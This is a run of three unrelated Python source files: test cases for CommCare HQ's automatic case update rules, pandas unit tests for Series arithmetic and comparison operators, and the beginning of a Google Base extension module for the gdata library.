self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property1', 'x')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property1', 'value1')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
@run_with_all_backends
def test_match_not_equal(self):
with _with_case(self.domain, 'test-case-type-2', datetime(2015, 1, 1)) as case:
AutomaticUpdateRuleCriteria.objects.create(
property_name='property2',
property_value='value2',
match_type=AutomaticUpdateRuleCriteria.MATCH_NOT_EQUAL,
rule=self.rule2,
)
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property2', 'value2')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property2', 'x')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
@run_with_all_backends
def test_date_case_properties_for_equality(self):
"""
Date case properties are automatically converted from string to date
when fetching from the db, so here we want to make sure this doesn't
interfere with our ability to compare dates for equality.
"""
with _with_case(self.domain, 'test-case-type-2', datetime(2015, 1, 1)) as case:
AutomaticUpdateRuleCriteria.objects.create(
property_name='property1',
property_value='2016-02-24',
match_type=AutomaticUpdateRuleCriteria.MATCH_EQUAL,
rule=self.rule2,
)
set_case_property_directly(case, 'property1', '2016-02-24')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property1', '2016-02-25')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
@run_with_all_backends
def test_date_case_properties_for_inequality(self):
with _with_case(self.domain, 'test-case-type-2', datetime(2015, 1, 1)) as case:
AutomaticUpdateRuleCriteria.objects.create(
property_name='property1',
property_value='2016-02-24',
match_type=AutomaticUpdateRuleCriteria.MATCH_NOT_EQUAL,
rule=self.rule2,
)
set_case_property_directly(case, 'property1', '2016-02-24')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property1', '2016-02-25')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
@run_with_all_backends
def test_match_has_value(self):
with _with_case(self.domain, 'test-case-type-2', datetime(2015, 1, 1)) as case:
AutomaticUpdateRuleCriteria.objects.create(
property_name='property3',
match_type=AutomaticUpdateRuleCriteria.MATCH_HAS_VALUE,
rule=self.rule2,
)
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property3', 'x')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property3', '')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
@run_with_all_backends
def test_and_criteria(self):
with _with_case(self.domain, 'test-case-type-2', datetime(2015, 1, 1)) as case:
AutomaticUpdateRuleCriteria.objects.create(
property_name='last_visit_date',
property_value='30',
match_type=AutomaticUpdateRuleCriteria.MATCH_DAYS_AFTER,
rule=self.rule2,
)
AutomaticUpdateRuleCriteria.objects.create(
property_name='property1',
property_value='value1',
match_type=AutomaticUpdateRuleCriteria.MATCH_EQUAL,
rule=self.rule2,
)
AutomaticUpdateRuleCriteria.objects.create(
property_name='property2',
property_value='value2',
match_type=AutomaticUpdateRuleCriteria.MATCH_NOT_EQUAL,
rule=self.rule2,
)
AutomaticUpdateRuleCriteria.objects.create(
property_name='property3',
match_type=AutomaticUpdateRuleCriteria.MATCH_HAS_VALUE,
rule=self.rule2,
)
set_case_property_directly(case, 'last_visit_date', '2015-11-01')
set_case_property_directly(case, 'property1', 'value1')
set_case_property_directly(case, 'property2', 'x')
set_case_property_directly(case, 'property3', 'x')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2015-12-30')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2015-11-01')
set_case_property_directly(case, 'property1', 'x')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property1', 'value1')
set_case_property_directly(case, 'property2', 'value2')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property2', 'x')
set_case_property_directly(case, 'property3', '')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property3', 'x')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
def test_get_rules_from_domain(self):
rules = AutomaticUpdateRule.by_domain(self.domain)
rules_by_case_type = AutomaticUpdateRule.organize_rules_by_case_type(rules)
expected_case_types = ['test-case-type', 'test-case-type-2', 'test-case-type-3']
actual_case_types = rules_by_case_type.keys()
self.assertEqual(set(expected_case_types), set(actual_case_types))
expected_rule_ids = [self.rule.pk, self.rule4.pk]
actual_rule_ids = [rule.pk for rule in rules_by_case_type['test-case-type']]
self.assertEqual(set(expected_rule_ids), set(actual_rule_ids))
expected_rule_ids = [self.rule2.pk, self.rule3.pk]
actual_rule_ids = [rule.pk for rule in rules_by_case_type['test-case-type-2']]
self.assertEqual(set(expected_rule_ids), set(actual_rule_ids))
expected_rule_ids = [self.rule5.pk]
actual_rule_ids = [rule.pk for rule in rules_by_case_type['test-case-type-3']]
self.assertEqual(set(expected_rule_ids), set(actual_rule_ids))
def test_boundary_date(self):
rules = AutomaticUpdateRule.by_domain(self.domain)
rules_by_case_type = AutomaticUpdateRule.organize_rules_by_case_type(rules)
boundary_date = AutomaticUpdateRule.get_boundary_date(
rules_by_case_type['test-case-type'], datetime(2016, 1, 1))
self.assertEqual(boundary_date, datetime(2015, 12, 2))
boundary_date = AutomaticUpdateRule.get_boundary_date(
rules_by_case_type['test-case-type-2'], datetime(2016, 1, 1))
self.assertEqual(boundary_date, datetime(2015, 12, 2))
@run_with_all_backends
def test_parent_cases(self):
with _with_case(self.domain, 'test-child-case-type', datetime(2016, 1, 1)) as child, \
_with_case(self.domain, 'test-parent-case-type', datetime(2016, 1, 1), case_name='abc') as parent:
# Set the parent case relationship
child = set_parent_case(self.domain, child, parent)
# Create a rule that references parent/name which should match
rule = AutomaticUpdateRule(
domain=self.domain,
name='test-parent-rule',
case_type='test-child-case-type',
active=True,
server_modified_boundary=30,
)
rule.save()
self.addCleanup(rule.delete)
AutomaticUpdateRuleCriteria.objects.create(
property_name='parent/name',
property_value='abc',
match_type=AutomaticUpdateRuleCriteria.MATCH_EQUAL,
rule=rule,
)
AutomaticUpdateAction.objects.create(
action=AutomaticUpdateAction.ACTION_UPDATE,
property_name='parent/update_flag',
property_value='P',
rule=rule,
)
AutomaticUpdateAction.objects.create(
action=AutomaticUpdateAction.ACTION_UPDATE,
property_name='parent_name',
property_value='parent/name',
property_value_type=AutomaticUpdateAction.CASE_PROPERTY,
rule=rule,
)
# rule should match on parent case property and update parent case
rule.apply_rule(child, datetime(2016, 3, 1))
updated_parent = self.case_db.get_case(parent.case_id)
updated_child = self.case_db.get_case(child.case_id)
self.assertEqual(updated_parent.get_case_property('update_flag'), 'P')
self.assertEqual(updated_child.get_case_property('parent_name'), 'abc')
# Update the rule to match on a different name and now it shouldn't match
rule.automaticupdaterulecriteria_set.all().delete()
AutomaticUpdateRuleCriteria.objects.create(
property_name='parent/name',
property_value='def',
match_type=AutomaticUpdateRuleCriteria.MATCH_EQUAL,
rule=rule,
)
self.assertFalse(rule.rule_matches_case(child, datetime(2016, 3, 1)))
@run_with_all_backends
def test_no_server_boundary(self):
with _with_case(self.domain, 'test-case-type-3', datetime(2016, 1, 1), case_name='signal') as case:
# no filtering on server modified date so same day matches
self.assertTrue(self.rule5.rule_matches_case(case, datetime(2016, 1, 1)))
@run_with_all_backends
def test_run_on_save(self):
with _with_case(self.domain, 'test-case-type-3', datetime(2016, 1, 1), case_name='signal') as case:
with patch('corehq.apps.data_interfaces.models.AutomaticUpdateRule.apply_rule') as apply:
# property is updated after save signal (case update used to force save)
update_case(self.domain, case.case_id, {})
apply.assert_called_once()
@run_with_all_backends
def test_early_task_exit(self):
with _with_case(self.domain, 'test-case-type-3', datetime(2016, 1, 1), case_name='signal') as case:
with patch('corehq.apps.data_interfaces.models.AutomaticUpdateRule.apply_rule') as apply:
hqcase.utils.update_case(case.domain, case.case_id, case_properties={}, xmlns=AUTO_UPDATE_XMLNS)
apply.assert_not_called()
@contextmanager
def _with_case(domain, case_type, last_modified, **kwargs):
with drop_connected_signals(case_post_save), drop_connected_signals(sql_case_post_save):
case = CaseFactory(domain).create_case(case_type=case_type, **kwargs)
_update_case(domain, case.case_id, last_modified)
accessors = CaseAccessors(domain)
case = accessors.get_case(case.case_id)
try:
yield case
finally:
if should_use_sql_backend(domain):
CaseAccessorSQL.hard_delete_cases(domain, [case.case_id])
else:
case.delete()
def _save_case(domain, case):
if should_use_sql_backend(domain):
CaseAccessorSQL.save_case(case)
else:
# can't call case.save() since it overrides the server_modified_on property
CommCareCase.get_db().save_doc(case.to_json())
def _update_case(domain, case_id, server_modified_on, last_visit_date=None):
accessors = CaseAccessors(domain)
case = accessors.get_case(case_id)
case.server_modified_on = server_modified_on
if last_visit_date:
set_case_property_directly(case, 'last_visit_date', last_visit_date.strftime('%Y-%m-%d'))
_save_case(domain, case)
def set_parent_case(domain, child_case, parent_case):
server_modified_on = child_case.server_modified_on
set_actual_parent_case(domain, child_case, parent_case)
child_case = CaseAccessors(domain).get_case(child_case.case_id)
child_case.server_modified_on = server_modified_on
_save_case(domain, child_case)
return CaseAccessors(domain).get_case(child_case.case_id)
| |
from datetime import timedelta
import operator
import numpy as np
import pytest
import pytz
from pandas._libs.tslibs import IncompatibleFrequency
import pandas as pd
from pandas import Categorical, Index, Series, bdate_range, date_range, isna
import pandas._testing as tm
from pandas.core import nanops, ops
def _permute(obj):
return obj.take(np.random.permutation(len(obj)))
class TestSeriesFlexArithmetic:
@pytest.mark.parametrize(
"ts",
[
(lambda x: x, lambda x: x * 2, False),
(lambda x: x, lambda x: x[::2], False),
(lambda x: x, lambda x: 5, True),
(lambda x: tm.makeFloatSeries(), lambda x: tm.makeFloatSeries(), True),
],
)
@pytest.mark.parametrize(
"opname", ["add", "sub", "mul", "floordiv", "truediv", "pow"]
)
def test_flex_method_equivalence(self, opname, ts):
# check that Series.{opname} behaves like Series.__{opname}__,
tser = tm.makeTimeSeries().rename("ts")
series = ts[0](tser)
other = ts[1](tser)
check_reverse = ts[2]
op = getattr(Series, opname)
alt = getattr(operator, opname)
result = op(series, other)
expected = alt(series, other)
tm.assert_almost_equal(result, expected)
if check_reverse:
rop = getattr(Series, "r" + opname)
result = rop(series, other)
expected = alt(other, series)
tm.assert_almost_equal(result, expected)
def test_flex_method_subclass_metadata_preservation(self, all_arithmetic_operators):
# GH 13208
class MySeries(Series):
_metadata = ["x"]
@property
def _constructor(self):
return MySeries
opname = all_arithmetic_operators
op = getattr(Series, opname)
m = MySeries([1, 2, 3], name="test")
m.x = 42
result = op(m, 1)
assert result.x == 42
def test_flex_add_scalar_fill_value(self):
# GH12723
s = Series([0, 1, np.nan, 3, 4, 5])
exp = s.fillna(0).add(2)
res = s.add(2, fill_value=0)
tm.assert_series_equal(res, exp)
pairings = [(Series.div, operator.truediv, 1), (Series.rdiv, ops.rtruediv, 1)]
for op in ["add", "sub", "mul", "pow", "truediv", "floordiv"]:
fv = 0
lop = getattr(Series, op)
lequiv = getattr(operator, op)
rop = getattr(Series, "r" + op)
# bind op at definition time...
requiv = lambda x, y, op=op: getattr(operator, op)(y, x)
pairings.append((lop, lequiv, fv))
pairings.append((rop, requiv, fv))
@pytest.mark.parametrize("op, equiv_op, fv", pairings)
def test_operators_combine(self, op, equiv_op, fv):
def _check_fill(meth, op, a, b, fill_value=0):
exp_index = a.index.union(b.index)
a = a.reindex(exp_index)
b = b.reindex(exp_index)
amask = isna(a)
bmask = isna(b)
exp_values = []
for i in range(len(exp_index)):
with np.errstate(all="ignore"):
if amask[i]:
if bmask[i]:
exp_values.append(np.nan)
continue
exp_values.append(op(fill_value, b[i]))
elif bmask[i]:
if amask[i]:
exp_values.append(np.nan)
continue
exp_values.append(op(a[i], fill_value))
else:
exp_values.append(op(a[i], b[i]))
result = meth(a, b, fill_value=fill_value)
expected = Series(exp_values, exp_index)
tm.assert_series_equal(result, expected)
a = Series([np.nan, 1.0, 2.0, 3.0, np.nan], index=np.arange(5))
b = Series([np.nan, 1, np.nan, 3, np.nan, 4.0], index=np.arange(6))
result = op(a, b)
exp = equiv_op(a, b)
tm.assert_series_equal(result, exp)
_check_fill(op, equiv_op, a, b, fill_value=fv)
# should accept axis=0 or axis='rows'
op(a, b, axis=0)
class TestSeriesArithmetic:
# Some of these may end up in tests/arithmetic, but are not yet sorted
def test_add_series_with_period_index(self):
rng = pd.period_range("1/1/2000", "1/1/2010", freq="A")
ts = Series(np.random.randn(len(rng)), index=rng)
result = ts + ts[::2]
expected = ts + ts
expected.iloc[1::2] = np.nan
tm.assert_series_equal(result, expected)
result = ts + _permute(ts[::2])
tm.assert_series_equal(result, expected)
msg = "Input has different freq=D from PeriodIndex\\(freq=A-DEC\\)"
with pytest.raises(IncompatibleFrequency, match=msg):
ts + ts.asfreq("D", how="end")
@pytest.mark.parametrize(
"target_add,input_value,expected_value",
[
("!", ["hello", "world"], ["hello!", "world!"]),
("m", ["hello", "world"], ["hellom", "worldm"]),
],
)
def test_string_addition(self, target_add, input_value, expected_value):
# GH28658 - ensure adding 'm' does not raise an error
a = Series(input_value)
result = a + target_add
expected = Series(expected_value)
tm.assert_series_equal(result, expected)
def test_divmod(self):
# GH#25557
a = Series([1, 1, 1, np.nan], index=["a", "b", "c", "d"])
b = Series([2, np.nan, 1, np.nan], index=["a", "b", "d", "e"])
result = a.divmod(b)
expected = divmod(a, b)
tm.assert_series_equal(result[0], expected[0])
tm.assert_series_equal(result[1], expected[1])
result = a.rdivmod(b)
expected = divmod(b, a)
tm.assert_series_equal(result[0], expected[0])
tm.assert_series_equal(result[1], expected[1])
@pytest.mark.parametrize("index", [None, range(9)])
def test_series_integer_mod(self, index):
# GH#24396
s1 = Series(range(1, 10))
s2 = Series("foo", index=index)
msg = "not all arguments converted during string formatting"
with pytest.raises(TypeError, match=msg):
s2 % s1
def test_add_with_duplicate_index(self):
# GH14227
s1 = Series([1, 2], index=[1, 1])
s2 = Series([10, 10], index=[1, 2])
result = s1 + s2
expected = pd.Series([11, 12, np.nan], index=[1, 1, 2])
tm.assert_series_equal(result, expected)
def test_add_na_handling(self):
from decimal import Decimal
from datetime import date
s = Series(
[Decimal("1.3"), Decimal("2.3")], index=[date(2012, 1, 1), date(2012, 1, 2)]
)
result = s + s.shift(1)
result2 = s.shift(1) + s
assert isna(result[0])
assert isna(result2[0])
def test_add_corner_cases(self, datetime_series):
empty = Series([], index=Index([]), dtype=np.float64)
result = datetime_series + empty
assert np.isnan(result).all()
result = empty + empty.copy()
assert len(result) == 0
# FIXME: dont leave commented-out
# TODO: this returned NotImplemented earlier, what to do?
# deltas = Series([timedelta(1)] * 5, index=np.arange(5))
# sub_deltas = deltas[::2]
# deltas5 = deltas * 5
# deltas = deltas + sub_deltas
# float + int
int_ts = datetime_series.astype(int)[:-5]
added = datetime_series + int_ts
expected = Series(
datetime_series.values[:-5] + int_ts.values,
index=datetime_series.index[:-5],
name="ts",
)
tm.assert_series_equal(added[:-5], expected)
def test_mul_empty_int_corner_case(self):
s1 = Series([], [], dtype=np.int32)
s2 = Series({"x": 0.0})
tm.assert_series_equal(s1 * s2, Series([np.nan], index=["x"]))
def test_sub_datetimelike_align(self):
# GH#7500
# datetimelike ops need to align
dt = Series(date_range("2012-1-1", periods=3, freq="D"))
dt.iloc[2] = np.nan
dt2 = dt[::-1]
expected = Series([timedelta(0), timedelta(0), pd.NaT])
# name is reset
result = dt2 - dt
tm.assert_series_equal(result, expected)
expected = Series(expected, name=0)
result = (dt2.to_frame() - dt.to_frame())[0]
tm.assert_series_equal(result, expected)
# ------------------------------------------------------------------
# Comparisons
class TestSeriesFlexComparison:
def test_comparison_flex_basic(self):
left = pd.Series(np.random.randn(10))
right = pd.Series(np.random.randn(10))
tm.assert_series_equal(left.eq(right), left == right)
tm.assert_series_equal(left.ne(right), left != right)
tm.assert_series_equal(left.le(right), left < right)
tm.assert_series_equal(left.lt(right), left <= right)
tm.assert_series_equal(left.gt(right), left > right)
tm.assert_series_equal(left.ge(right), left >= right)
# axis
for axis in [0, None, "index"]:
tm.assert_series_equal(left.eq(right, axis=axis), left == right)
tm.assert_series_equal(left.ne(right, axis=axis), left != right)
tm.assert_series_equal(left.le(right, axis=axis), left < right)
tm.assert_series_equal(left.lt(right, axis=axis), left <= right)
tm.assert_series_equal(left.gt(right, axis=axis), left > right)
tm.assert_series_equal(left.ge(right, axis=axis), left >= right)
#
msg = "No axis named 1 for object type"
for op in ["eq", "ne", "le", "le", "gt", "ge"]:
with pytest.raises(ValueError, match=msg):
getattr(left, op)(right, axis=1)
def test_comparison_flex_alignment(self):
left = Series([1, 3, 2], index=list("abc"))
right = Series([2, 2, 2], index=list("bcd"))
exp = pd.Series([False, False, True, False], index=list("abcd"))
tm.assert_series_equal(left.eq(right), exp)
exp = pd.Series([True, True, False, True], index=list("abcd"))
tm.assert_series_equal(left.ne(right), exp)
exp = pd.Series([False, False, True, False], index=list("abcd"))
tm.assert_series_equal(left.le(right), exp)
exp = pd.Series([False, False, False, False], index=list("abcd"))
tm.assert_series_equal(left.lt(right), exp)
exp = pd.Series([False, True, True, False], index=list("abcd"))
tm.assert_series_equal(left.ge(right), exp)
exp = pd.Series([False, True, False, False], index=list("abcd"))
tm.assert_series_equal(left.gt(right), exp)
def test_comparison_flex_alignment_fill(self):
left = Series([1, 3, 2], index=list("abc"))
right = Series([2, 2, 2], index=list("bcd"))
exp = pd.Series([False, False, True, True], index=list("abcd"))
tm.assert_series_equal(left.eq(right, fill_value=2), exp)
exp = pd.Series([True, True, False, False], index=list("abcd"))
tm.assert_series_equal(left.ne(right, fill_value=2), exp)
exp = pd.Series([False, False, True, True], index=list("abcd"))
tm.assert_series_equal(left.le(right, fill_value=0), exp)
exp = pd.Series([False, False, False, True], index=list("abcd"))
tm.assert_series_equal(left.lt(right, fill_value=0), exp)
exp = pd.Series([True, True, True, False], index=list("abcd"))
tm.assert_series_equal(left.ge(right, fill_value=0), exp)
exp = pd.Series([True, True, False, False], index=list("abcd"))
tm.assert_series_equal(left.gt(right, fill_value=0), exp)
class TestSeriesComparison:
def test_comparison_different_length(self):
a = Series(["a", "b", "c"])
b = Series(["b", "a"])
msg = "only compare identically-labeled Series"
with pytest.raises(ValueError, match=msg):
a < b
a = Series([1, 2])
b = Series([2, 3, 4])
with pytest.raises(ValueError, match=msg):
a == b
@pytest.mark.parametrize("opname", ["eq", "ne", "gt", "lt", "ge", "le"])
def test_ser_flex_cmp_return_dtypes(self, opname):
# GH#15115
ser = Series([1, 3, 2], index=range(3))
const = 2
result = getattr(ser, opname)(const).dtypes
expected = np.dtype("bool")
assert result == expected
@pytest.mark.parametrize("opname", ["eq", "ne", "gt", "lt", "ge", "le"])
def test_ser_flex_cmp_return_dtypes_empty(self, opname):
# GH#15115 empty Series case
ser = Series([1, 3, 2], index=range(3))
empty = ser.iloc[:0]
const = 2
result = getattr(empty, opname)(const).dtypes
expected = np.dtype("bool")
assert result == expected
@pytest.mark.parametrize(
"op",
[operator.eq, operator.ne, operator.le, operator.lt, operator.ge, operator.gt],
)
@pytest.mark.parametrize(
"names", [(None, None, None), ("foo", "bar", None), ("baz", "baz", "baz")]
)
def test_ser_cmp_result_names(self, names, op):
# datetime64 dtype
dti = pd.date_range("1949-06-07 03:00:00", freq="H", periods=5, name=names[0])
ser = Series(dti).rename(names[1])
result = op(ser, dti)
assert result.name == names[2]
# datetime64tz dtype
dti = dti.tz_localize("US/Central")
dti = pd.DatetimeIndex(dti, freq="infer") # freq not preserved by tz_localize
ser = Series(dti).rename(names[1])
result = op(ser, dti)
assert result.name == names[2]
# timedelta64 dtype
tdi = dti - dti.shift(1)
ser = Series(tdi).rename(names[1])
result = op(ser, tdi)
assert result.name == names[2]
# interval dtype
if op in [operator.eq, operator.ne]:
# interval dtype comparisons not yet implemented
ii = pd.interval_range(start=0, periods=5, name=names[0])
ser = Series(ii).rename(names[1])
result = op(ser, ii)
assert result.name == names[2]
# categorical
if op in [operator.eq, operator.ne]:
# categorical dtype comparisons raise for inequalities
cidx = tdi.astype("category")
ser = Series(cidx).rename(names[1])
result = op(ser, cidx)
assert result.name == names[2]
def test_comparisons(self):
left = np.random.randn(10)
right = np.random.randn(10)
left[:3] = np.nan
result = nanops.nangt(left, right)
with np.errstate(invalid="ignore"):
expected = (left > right).astype("O")
expected[:3] = np.nan
tm.assert_almost_equal(result, expected)
s = Series(["a", "b", "c"])
s2 = Series([False, True, False])
# it works!
exp = Series([False, False, False])
tm.assert_series_equal(s == s2, exp)
tm.assert_series_equal(s2 == s, exp)
# -----------------------------------------------------------------
# Categorical Dtype Comparisons
def test_categorical_comparisons(self):
# GH#8938
# allow equality comparisons
a = Series(list("abc"), dtype="category")
b = Series(list("abc"), dtype="object")
c = Series(["a", "b", "cc"], dtype="object")
d = Series(list("acb"), dtype="object")
e = Categorical(list("abc"))
f = Categorical(list("acb"))
# vs scalar
assert not (a == "a").all()
assert ((a != "a") == ~(a == "a")).all()
assert not ("a" == a).all()
assert (a == "a")[0]
assert ("a" == a)[0]
assert not ("a" != a)[0]
# vs list-like
assert (a == a).all()
assert not (a != a).all()
assert (a == list(a)).all()
assert (a == b).all()
assert (b == a).all()
assert ((~(a == b)) == (a != b)).all()
assert ((~(b == a)) == (b != a)).all()
assert not (a == c).all()
assert not (c == a).all()
assert not (a == d).all()
assert not (d == a).all()
# vs a cat-like
assert (a == e).all()
assert (e == a).all()
assert not (a == f).all()
assert not (f == a).all()
assert (~(a == e) == (a != e)).all()
assert (~(e == a) == (e != a)).all()
assert (~(a == f) == (a != f)).all()
assert (~(f == a) == (f != a)).all()
# non-equality is not comparable
msg = "can only compare equality or not"
with pytest.raises(TypeError, match=msg):
a < b
with pytest.raises(TypeError, match=msg):
b < a
with pytest.raises(TypeError, match=msg):
a > b
with pytest.raises(TypeError, match=msg):
b > a
def test_unequal_categorical_comparison_raises_type_error(self):
# unequal comparison should raise for unordered cats
cat = Series(Categorical(list("abc")))
msg = "can only compare equality or not"
with pytest.raises(TypeError, match=msg):
cat > "b"
cat = Series(Categorical(list("abc"), ordered=False))
with pytest.raises(TypeError, match=msg):
cat > "b"
# https://github.com/pandas-dev/pandas/issues/9836#issuecomment-92123057
# and following comparisons with scalars not in categories should raise
# for unequal comps, but not for equal/not equal
cat = Series(Categorical(list("abc"), ordered=True))
msg = "Cannot compare a Categorical for op.+with a scalar"
with pytest.raises(TypeError, match=msg):
cat < "d"
with pytest.raises(TypeError, match=msg):
cat > "d"
with pytest.raises(TypeError, match=msg):
"d" < cat
with pytest.raises(TypeError, match=msg):
"d" > cat
tm.assert_series_equal(cat == "d", Series([False, False, False]))
tm.assert_series_equal(cat != "d", Series([True, True, True]))
# -----------------------------------------------------------------
def test_comparison_tuples(self):
# GH#11339
# comparisons vs tuple
s = Series([(1, 1), (1, 2)])
result = s == (1, 2)
expected = Series([False, True])
tm.assert_series_equal(result, expected)
result = s != (1, 2)
expected = Series([True, False])
tm.assert_series_equal(result, expected)
result = s == (0, 0)
expected = Series([False, False])
tm.assert_series_equal(result, expected)
result = s != (0, 0)
expected = Series([True, True])
tm.assert_series_equal(result, expected)
s = Series([(1, 1), (1, 1)])
result = s == (1, 1)
expected = Series([True, True])
tm.assert_series_equal(result, expected)
result = s != (1, 1)
expected = Series([False, False])
tm.assert_series_equal(result, expected)
s = Series([frozenset([1]), frozenset([1, 2])])
result = s == frozenset([1])
expected = Series([True, False])
tm.assert_series_equal(result, expected)
def test_comparison_operators_with_nas(self):
ser = Series(bdate_range("1/1/2000", periods=10), dtype=object)
ser[::2] = np.nan
# test that comparisons work
ops = ["lt", "le", "gt", "ge", "eq", "ne"]
for op in ops:
val = ser[5]
f = getattr(operator, op)
result = f(ser, val)
expected = f(ser.dropna(), val).reindex(ser.index)
if op == "ne":
expected = expected.fillna(True).astype(bool)
else:
expected = expected.fillna(False).astype(bool)
tm.assert_series_equal(result, expected)
# FIXME: dont leave commented-out
# fffffffuuuuuuuuuuuu
# result = f(val, s)
# expected = f(val, s.dropna()).reindex(s.index)
# tm.assert_series_equal(result, expected)
def test_ne(self):
ts = Series([3, 4, 5, 6, 7], [3, 4, 5, 6, 7], dtype=float)
expected = [True, True, False, True, True]
assert tm.equalContents(ts.index != 5, expected)
assert tm.equalContents(~(ts.index == 5), expected)
def test_comp_ops_df_compat(self):
# GH 1134
s1 = pd.Series([1, 2, 3], index=list("ABC"), name="x")
s2 = pd.Series([2, 2, 2], index=list("ABD"), name="x")
s3 = pd.Series([1, 2, 3], index=list("ABC"), name="x")
s4 = pd.Series([2, 2, 2, 2], index=list("ABCD"), name="x")
for left, right in [(s1, s2), (s2, s1), (s3, s4), (s4, s3)]:
msg = "Can only compare identically-labeled Series objects"
with pytest.raises(ValueError, match=msg):
left == right
with pytest.raises(ValueError, match=msg):
left != right
with pytest.raises(ValueError, match=msg):
left < right
msg = "Can only compare identically-labeled DataFrame objects"
with pytest.raises(ValueError, match=msg):
left.to_frame() == right.to_frame()
with pytest.raises(ValueError, match=msg):
left.to_frame() != right.to_frame()
with pytest.raises(ValueError, match=msg):
left.to_frame() < right.to_frame()
def test_compare_series_interval_keyword(self):
# GH#25338
s = Series(["IntervalA", "IntervalB", "IntervalC"])
result = s == "IntervalA"
expected = Series([True, False, False])
tm.assert_series_equal(result, expected)
# ------------------------------------------------------------------
# Unsorted
# These arithmetic tests were previously in other files, eventually
# should be parametrized and put into tests.arithmetic
class TestTimeSeriesArithmetic:
# TODO: De-duplicate with test below
def test_series_add_tz_mismatch_converts_to_utc_duplicate(self):
rng = date_range("1/1/2011", periods=10, freq="H", tz="US/Eastern")
ser = Series(np.random.randn(len(rng)), index=rng)
ts_moscow = ser.tz_convert("Europe/Moscow")
result = ser + ts_moscow
assert result.index.tz is pytz.utc
result = ts_moscow + ser
assert result.index.tz is pytz.utc
def test_series_add_tz_mismatch_converts_to_utc(self):
rng = date_range("1/1/2011", periods=100, freq="H", tz="utc")
perm = np.random.permutation(100)[:90]
ser1 = Series(
np.random.randn(90), index=rng.take(perm).tz_convert("US/Eastern")
)
perm = np.random.permutation(100)[:90]
ser2 = Series(
np.random.randn(90), index=rng.take(perm).tz_convert("Europe/Berlin")
)
result = ser1 + ser2
uts1 = ser1.tz_convert("utc")
uts2 = ser2.tz_convert("utc")
expected = uts1 + uts2
assert result.index.tz == pytz.UTC
tm.assert_series_equal(result, expected)
def test_series_add_aware_naive_raises(self):
rng = date_range("1/1/2011", periods=10, freq="H")
ser = Series(np.random.randn(len(rng)), index=rng)
ser_utc = ser.tz_localize("utc")
msg = "Cannot join tz-naive with tz-aware DatetimeIndex"
with pytest.raises(Exception, match=msg):
ser + ser_utc
with pytest.raises(Exception, match=msg):
ser_utc + ser
def test_datetime_understood(self):
# Ensures it doesn't fail to create the right series
# reported in issue#16726
series = pd.Series(pd.date_range("2012-01-01", periods=3))
offset = pd.offsets.DateOffset(days=6)
result = series - offset
expected = pd.Series(pd.to_datetime(["2011-12-26", "2011-12-27", "2011-12-28"]))
tm.assert_series_equal(result, expected)
| |
#!/usr/bin/python
#
# Copyright (C) 2006 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains extensions to Atom objects used with Google Base."""
__author__ = 'api.jscudder (Jeffrey Scudder)'
try:
from xml.etree import cElementTree as ElementTree
except ImportError:
try:
import cElementTree as ElementTree
except ImportError:
from elementtree import ElementTree
import atom
import gdata
# XML namespaces which are often used in Google Base entities.
GBASE_NAMESPACE = 'http://base.google.com/ns/1.0'
GBASE_TEMPLATE = '{http://base.google.com/ns/1.0}%s'
GMETA_NAMESPACE = 'http://base.google.com/ns-metadata/1.0'
GMETA_TEMPLATE = '{http://base.google.com/ns-metadata/1.0}%s'
class ItemAttributeContainer(object):
"""Provides methods for finding Google Base Item attributes.
Google Base item attributes are child nodes in the gbase namespace. Google
Base allows you to define your own item attributes and this class provides
methods to interact with the custom attributes.
"""
def GetItemAttributes(self, name):
"""Returns a list of all item attributes which have the desired name.
Args:
name: str The tag of the desired base attributes. For example, calling
this method with 'rating' would return a list of ItemAttributes
represented by a 'g:rating' tag.
Returns:
A list of matching ItemAttribute objects.
"""
result = []
for attrib in self.item_attributes:
if attrib.name == name:
result.append(attrib)
return result
def FindItemAttribute(self, name):
"""Get the contents of the first Base item attribute which matches name.
This method is deprecated, please use GetItemAttributes instead.
Args:
name: str The tag of the desired base attribute. For example, calling
this method with name = 'rating' would search for a tag rating
in the GBase namespace in the item attributes.
Returns:
The text contents of the item attribute, or none if the attribute was
not found.
"""
for attrib in self.item_attributes:
if attrib.name == name:
return attrib.text
return None
def AddItemAttribute(self, name, value, value_type=None):
"""Adds a new item attribute tag containing the value.
Creates a new extension element in the GBase namespace to represent a
Google Base item attribute.
Args:
name: str The tag name for the new attribute. This must be a valid xml
tag name. The tag will be placed in the GBase namespace.
value: str Contents for the item attribute
